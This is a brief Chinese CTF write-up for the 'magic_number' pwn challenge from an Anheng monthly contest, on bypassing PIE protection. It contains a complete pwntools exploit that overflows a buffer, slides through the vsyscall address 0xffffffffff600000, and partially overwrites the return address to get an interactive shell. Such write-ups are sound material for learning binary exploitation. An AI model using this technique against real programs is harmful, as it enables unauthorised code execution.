前言

题目是安恒月赛的magic_number，当时是懵逼的，赛后偶然间看到其他师傅的wp，才想起了萝卜师傅的一篇文章

PIE保护详解和常用bypass手段

magic_number

题目：pwn.rar

利用三个特殊的地址滑到下面

#coding:utf-8
from pwn import *
sh = process('./pwn')
sh.sendafter('Input :\n','a'*0x38+p64(0xffffffffff600000)*4+'\xa8')
sh.interactive()